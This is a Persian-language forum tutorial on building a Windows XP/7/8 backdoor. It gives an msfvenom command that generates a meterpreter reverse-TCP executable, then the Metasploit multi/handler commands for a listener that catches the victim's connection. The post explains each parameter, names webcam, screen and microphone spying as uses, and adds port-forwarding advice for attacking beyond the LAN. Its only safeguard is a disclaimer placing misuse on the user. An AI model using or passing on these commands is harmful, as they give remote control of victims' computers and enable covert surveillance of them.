Loading…

جزیره امنیت اطلاعات و ارتباطات

ارسال کننده: EdrisSharifi
مسلط به تکنولوژی ها HTML5,CSS3 , زبان های PHP,C-Sharp-java-vb.net و متخصص هک و نفوذ به کلاینت ها
ارسال پیام خصوصی
امتیازات این مطلب
نکته: ساخت بکدور (BackDoor) برای ویندوز 7,8,Xp (هر گونه سوء استفاده بر عهده خود کاربر میباشد)
به نام خدا ، در این آموزش به ساخت بکدور(BackDoor) برای ویندوز XP ,7 , 8 میپردازیم . (هر گونه سوء استفاده بر عهده خود کاربر میباشد).
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=4444 -f exe > /root/Desktop/Backdoor.exe
شما میتونید با استفاده از این کد برای ویندوز های xp , 7 , 8 بکدور بسازید .

توضیح اصطلاحات :


  • msfvenom : این دستور جایگزینی برای دستورات msfpayload و msfencode بود از سال 2015 با ساخت کالی ورژن 2.0 جایگزین این دو دستور شد و کارش هم ساخت پیلود و اینکودر برای بکدور هستش .
  • p- : این پارامتر برای ساخت پیلود تحت یک پلت فرم مورد استفاده قرار میگیره مثلا : ویندوز یا لینوکس خودش یا اندروید و ...
  • meterpreter/reverse_tcp : این دستور برای اینه که بعد از اجرای بکدور توسط قربانی به شما دسترسی ریموت شل میده و میتونید با پارامتر های زیادی کار کنید . از جمله : دیدن وبکم و صفحه دسکتاپ قربانی و اسکرین شات از صفحه و ضبط صدا و ...
  • f- : این پارامتر میاد برای ما فرمت فایل خروجی رو تعیین میکنه : مثلا اجرایی باشه یا ...
  • LHOST : با این دستور میایم یه آیپی ست میکنیم که اطلاعات ارسالی از قربانی به این آی پی ارسال بشه .
  • LPORT : با این دستور میایم یه پورت ست میکنیم که اطلات ارسالی از قربانی با اسفتاده از این پورت دریافت بشه .
  • > /root/Desktop/Backdoor.exe: این محل دخیره فایل بکدور ما هستش که گفتیم تو مسیر روت دسکتاپ و با اسم بکدور ذخیره بشه .

خب بعد از ساخت بکدور ما باید یه لیسینر یا گوش دهنده بسازیم که بیاد برای ما به آی پی و پورتی که به بکدور دادیم گوش بده و اطلاعات رو برای ما دریافت کنه ، با تایپ دستور msfconsole در محیط ترمینال وارد متااسپلویت میشیم :
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit

توضیح اصطلاحات :


  • use exploitmultihandler : این دستور میاد یه هندلر ایجاد میکنه .
  • set payload windowsmeterpreterreverse_tcp : این دستور میاد به گوش هندلر میفهمونه که ما با استفاده از این پیلود میخایم ارتباط برقرار کنیم .
  • set LHOST : این دستور میاد آی پی که قبلا داخل ساخت بکدور استفاده کرده بودیم رو ازمون میگیره تا به همون آی پی گوش بده .
  • set LPORT : این دستور هم میاد پورتی که قبلا داخل ساخت بکدور استفاده کرده بودیم رو ازمون میگیره تا با استفاده از همون پورت اطلاعات رو بفرسته برامون .
  • exploit : این دستور هم در آخر سر میاد گوش دهنده رو در حالت اجرا میزاره تا وقتی که بکدور توسط قربانی اجرا بشه .

نکته : این آموزش فقط برای شبکه داخلی یا همون Lan هستش اگر میخاهید برای Wan یا همون شبکه جهانی باشه باید عملیات پورت فورواردینگ رو انجام بدید . که داخل سایت آموزش پورت فورواردینگ هستش و نیاز به آموزش نیست .
دیدگاه ها
  • ارسال توسط:
  • زمان ارسال: 10 ماه قبل
خیلی ممنون از این سرعت عملتون در پاسخ گویی.
واقعا ممنون.
برای ارسال نظر وارد شوید.